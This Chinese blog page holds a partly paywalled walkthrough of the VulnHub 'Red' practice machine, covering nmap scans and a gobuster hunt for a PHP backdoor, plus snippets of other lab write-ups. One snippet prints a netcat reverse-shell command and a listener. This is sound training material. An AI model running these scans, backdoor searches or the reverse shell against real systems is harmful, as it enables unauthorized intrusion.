vulnhub靶场5:red

最新推荐文章于 2025-12-12 14:04:07 发布
原创 最新推荐文章于 2025-12-12 14:04:07 发布 · 250 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

文章描述了一次网络安全渗透测试的过程,从使用nmap进行局域网扫描和端口映射,发现开放的80和22端口,到利用gobuster扫描后门,找到NetworkFileManagerPHP.php。通过参数扫描、hashcat密码爆破、hydrassh爆破获取登录凭据,然后利用sudo权限切换用户并反弹shell。最终,通过监控进程和查找计划任务,获得root权限。

1、局域网扫描

nmap -sn 192.168.8.0/24

2、map端口扫描,开放80、22端口

nmap -sC -sV 192.168.8.161

 3、访问80,配置host,在网页源码中看到一段提示

 

 于是在github网站,下周seclists字典库,并且由于提示存在php后面,使用gobuster进行后门扫描

4、发现存在后门NetworkFileManagerPHP.php

gobuster dir -u http://redrocks.win -w /usr/share/seclists/Discovery/Web-content/CommonBackdoors-PHP.fuzz.txt

最低0.47元/天 解锁文章
vulnhub——Red:1靶机
Re1_zf的博客
10-31 1306
然后就不需要手动执行了,这里会生成一个新的rev文件,这个rev文件会驱动supersecretfileuc.c的执行,即它会自动执行,在攻击机上监听对应端口就可以了。这里回到前面搜索ippsec有权限的目录时搜索到的一个用户目录,查看一下另一个没有提到的用户目录,拿到另一个flag。可以将这个文件的内容进行一下替换,替换为反弹shell的脚本,这样就可以弹回root权限的shell了应该。前面探查到了这个网站是wordpress的架构,利用文件包含查看一下它的配置文件,看有没有什么有用的信息。
vulnhub靶场之 LordOfTheRoot_1.0.1
wanan的博客
10-09 1221
vulnhub靶场之 LordOfTheRoot_1.0.1
vulnhub Funbox: Under Construction
箭雨镜屋
05-28 669
渗透思路:nmap扫描端口----dirb扫描网站目录----利用osCommerce v2.3.4.1的rce漏洞getshell----pspy64s发现定时任务----信息泄漏获得root密码----su输入密码提权
渗透测试--GROTESQUE: 2漏洞复现
qq_59589136的博客
06-08 396
4、编辑网卡配置文件vi /etc/network/interfaces,在vi命令模式下,是不能直接编辑文本的,输入的字母会被当做命令执行,按i,切换到插入模式,进行文本编辑,esc退出编辑模式。由于我的版本过低,原来是没有pspy64s这个工具包,需要下载安装到kali攻击机上,但是又显glibc版本过低,需要下载高一点的版本。命令:for i in {23..556};下载安装时又显示bison太旧,需要更新升级,发现是没有安装bison的,安装过程又需要连接到github安装工具,最后成功。
靶场练习第十九天~vulnhub靶场之GreenOptic: 1
qq_57976347的博客
02-18 1040
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:GreenOptic: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -sV 192.168.101.123 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息
Vulnhub靶场案例渗透[13]-Grotesque: 2
qq_45776114的博客
11-21 1119
中等难度的靶场,目标是获取flag。
Vulnhub靶场Red:1
Nailaoyyds的博客
06-14 2117
目录前期配置​记一次kali双网卡IP不显示问题环境介绍一、信息收集nmap扫描 寻找线索 后门文件爆破 参数爆破 文件包含利用 filter伪协议 远程连接 权限提升 会话维持pspy64s监听 反弹shell代码 前期配置 记一次kali双网卡IP不显示问题 添加网卡适配器配置网卡编辑器 开启网卡 网络配置中添加eth1网卡 重启网络服务,已经获取到IP 一、信息收集 nmap扫描 访问IP 确定靶机位置 点击search会跳转到一个域名 修改hosts解析使它正常访问wi
vulnhub实战:Red
huangyongkang666的博客
05-19 2096
vulnhub实战:Red 1.Red介绍 描述 红色已经接管了你的系统,你能重新获得控制权吗? 下载地址: https://download.vulnhub.com/red/Red.ova 2.安装部署 下载之后使用VMware打开.ova文件,打开结果,设置为Net模式 由于打开后,使用以下命令:无法获取到ip arp-scan -l 这种一般都是网卡配置问题,于是进行查看,在开启靶机时按shift键,出现如下界面 往下找到第一个linux字符串,找到 ro xxxxx,然后改成 rw sing
Red:1靶场环境部署及其渗透测试笔记(Vulnhub
m0_73062138的博客
04-24 844
本次实验的环境需要用到VirtualBox(桥接网卡),VMware(桥接网卡)两台虚拟机(网段都在192.168.152.0/24)。为什么要使用VirtualBox?原因是我在WMware上搭建靶机,使用kali扫描,一直都扫描不上靶机的IP地址,查阅了一些资料说是在VirtualBox中可以使用,便进行了尝试,发现可以成功。链接: https://pan.baidu.com/s/1RFJtq4Ea2LDF28kfmLMqow?pwd=5jk8 提取码: 5jk8。
靶机渗透练习17-Red
hirak0的博客
04-16 2043
靶机描述 靶机地址:https://www.vulnhub.com/entry/napping-101,752/ Description Even Admins can fall asleep on the job This works better with VirtualBox rather than VMware ## Changelog v1.0.1 - 2021-10-30 v1.0.0 - 2021-10-22 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机:
pspy:在没有root权限的情况下监视linux进程
03-31
pspy-无特权Linux进程监听 pspy是一种命令行工具,旨在无需根权限就可以窥探进程。 它允许您在其他用户执行命令时查看它们,cron作业等。 非常适合枚举CTF中Linux系统。 很好地向您的同事展示为什么在命令行中将秘密作为参数传递是一个坏主意。 该工具从procfs扫描中收集信息。 放置在文件系统选定部分上的Inotify观察程序将触发这些扫描,以捕获短暂的进程。 入门 下载 将工具安装到要检查Linux机器上。 首先获取二进制文件。 在此处下载发布的二进制文件: 32位大,静态版本: pspy32 64位大,静态版本: pspy64 32位小版本: pspy32s 64位小版本: pspy64s 静态编译的文件应可在任何Linux系统上使用,但容量很大(〜4MB)。 如果有大小问题,请尝试较小的版本,该版本取决于libc并使用UPX(〜1MB)压缩。 建造 您可以使用系
Python-PSPy一个简单的Python27AWSLambda函数
08-10
PSPy 一个简单的Python 2.7 AWS Lambda函数,用于执行PowerShell binary和编组输入/输出到PowerShell
靶机练习No.19 VulnHub靶机 Red-1目录扫出后门,wfuzz 枚举参数,filter协议读取数据库源码,hashcat解密 time提权 .c后门反弹shell
YouthBelief的博客
01-14 2218
0x00 环境准备 下载地址: https://www.vulnhub.com/entry/red-1,753/ virtual box 导入靶机 难度:中 靶机上架时间:2021年11月3日 提示:Red has taken over your system, are you able to regain control? 红色已经控制了你的系统,你能重新控制吗? 0x01 信息收集 靶机ip探测 端口服务识别 扫出开放 22和80端口, 80端口wordpress 5.8
vulnhub | BROKEN-2020: 1
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
09-07 594
文章目录总结前言开始 总结 - 0. arp 扫描 | netdiscover -i eth0 | arp-scan --interface=eth0 --localnet - 0.1 查看定时任务 | cat /etc/crontab - 1. python 开启一个http服务器 | python3 -m http.server 8080 - 2. nc 开启监听 | nc -lvp 4444 - 3. nc 反弹shell | nc -e /bin/bash 10.0.2.4 4444 -
VulnHub-CewlKid
sanqin_的博客
11-20 450
靶机 DHCP 未能正确分配 IP :看这里 按照正常流程 nmap -sV ip 发现开放三个端口 22端口:ssh 80端口:浏览器打开是阿帕奇 8080端口:浏览器打开是网页 查看8080端口的网页,在 F12发现一串密文 尝试使用常用的解码方式解密无果后,先保存下来 发现有登入页面,在尝试常用万能密码无法登入后, 使用使用爬虫创建自字典的工具 cewl http://192.168.1.126:8080 > key.lst 然后bp抓取登入信息,使用字典爆破 点击爆破,找到密码,Le
OpenHarmony Flutter 分布式安全与隐私保护:跨设备可信交互与数据防泄漏方案
2501_93721151的博客
12-11 747
在开源鸿蒙(OpenHarmony)全场景分布式生态中,跨设备安全与隐私保护是实现多设备协同的生命线。随着设备间数据流通与交互频率的提升,数据泄露、身份伪造、权限滥用等安全风险也随之加剧;传统单设备安全方案难以适配分布式场景下的可信交互需求。基于开源鸿蒙的分布式安全服务(DSS)与 Flutter 的跨端安全开发能力,能够构建一套 **“设备可信认证、数据加密传输、权限动态管控、隐私数据脱敏”** 的分布式安全与隐私保护解决方案,赋能金融支付、健康医疗、智能家居等高敏感场景的跨设备协同。本文聚焦。
安全审查--跨站请求伪造--双重提交Cookie模式
petunsecn的专栏
12-12 713
本文详细讲解了双重提交Cookie模式防御CSRF攻击的原理与实现。首先通过网上银行转账案例展示了CSRF攻击的危害性,解释了攻击者如何利用浏览器自动携带Cookie的特性发起恶意请求。随后深入剖析了双重提交Cookie的核心理念:利用同源策略,要求请求同时携带Cookie中的token和请求头/体中的token进行双重验证。 文章从零开始演示了实现步骤:1)服务器设置可被JavaScript读取的CSRF Token Cookie;2)前端获取Cookie中的token并添加到请求头;3)服务器验证两个t
App反诈骗:一场面向移动生态的深度安全战争(接上文短信反诈)
最新发布
xixixi7777的博客
12-12 1352
App反诈骗的最终目标是构建一个安全、可信、透明技术支柱:持续创新的检测与防御技术制度支柱:完善的法律法规与行业标准治理支柱:跨平台、跨行业的协同治理机制教育支柱:提升开发者和用户的安全意识经济支柱:建立正向激励与惩罚机制与短信反诈相比,App反诈的战场更广、链条更长、对抗更复杂。这是一场技术、法律、经济、社会的综合性战役,其成功不仅需要先进的技术手段,更需要生态系统各方的共同责任和长期投入。真正的App反诈不是简单的"查杀",而是通过纵深防御、主动狩猎、生态治理。
DNS协议安全
weixin_61562383的博客
12-12 1030
许多企业的防火墙会拦截内部员工直接访问外部网站的 HTTP/TCP 连接,但通常会放行 DNS 流量,因为员工需要解析域名才能工作。阴影域名:黑客攻破了合法网站(如 example.com)的管理权,创建了恶意的子域名(如 bad.example.com)。DNS 协议在设计之初就像是在“明信片”上写字,任何人都可以拦截、修改(中间人攻击),或者伪造一张新的明信片发给你(欺骗/投毒)。:为了防止命令控制服务器(C&C)的域名被封杀,僵尸程序会内置一套算法,每天自动生成成千上万个随机域名。
vulnhub之WTF:1靶场
12-31
### 关于VulnHub上WTF:1靶场的使用指南 #### 初始设置与环境准备 为了开始探索和利用WTF:1靶场,首先需要下载并配置虚拟机镜像。此过程可以通过访问[VulnHub](https://www.vulnhub.com/)来完成,在网站中搜索"WTF:1"以获取具体的下载链接[^2]。 #### 渗透测试流程概述 一旦成功部署了WTF:1虚拟机,可以按照以下思路来进行渗透测试: - **信息收集阶段** 开始时应进行全面的信息搜集工作,包括但不限于网络扫描、服务枚举和服务版本识别等操作。Nmap是一个非常有用的工具用于初步探测目标系统的开放端口和服务情况。 - **漏洞分析阶段** 基于前期获得的情报数据,进一步深入研究可能存在的安全弱点。对于Web应用程序而言,OWASP Top Ten中的常见问题值得特别关注;而对于操作系统层面,则需留意已知的安全缺陷以及不当权限配置等问题。 - **攻击实施阶段** 当发现潜在可被利用的漏洞之后,便可以选择适当的方法尝试突破防线。例如,如果存在弱密码保护的服务账号,那么借助如Hydra这样的暴力破解工具配合高质量的字典文件(比如来自[SecLists项目][^3]),或许能够取得意想不到的效果。 - **后渗透活动** 成功获取到一定级别的控制权以后,继续挖掘更高层次的特权提升机会至关重要。针对Linux系统来说,`sudoers`文件错误配置或是特定命令未正确限制执行范围等情况都可能是实现提权的关键所在[^4]。 #### 实际案例解析 具体到本实例中提到的内容,当遇到涉及ROT编码的情况时,考虑到ROT13是一种简单的替换型加密方式,可以直接通过专门设计用来处理这类变换的在线平台快速得到明文形式的数据[^5]。 ```bash curl http://example.com/encoded.txt | tr 'A-Za-z' 'N-ZA-Mn-za-m' ``` 上述脚本展示了如何利用Unix/Linux下的标准实用程序`tr`来手动解码一段经过ROT13转换后的字符串。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值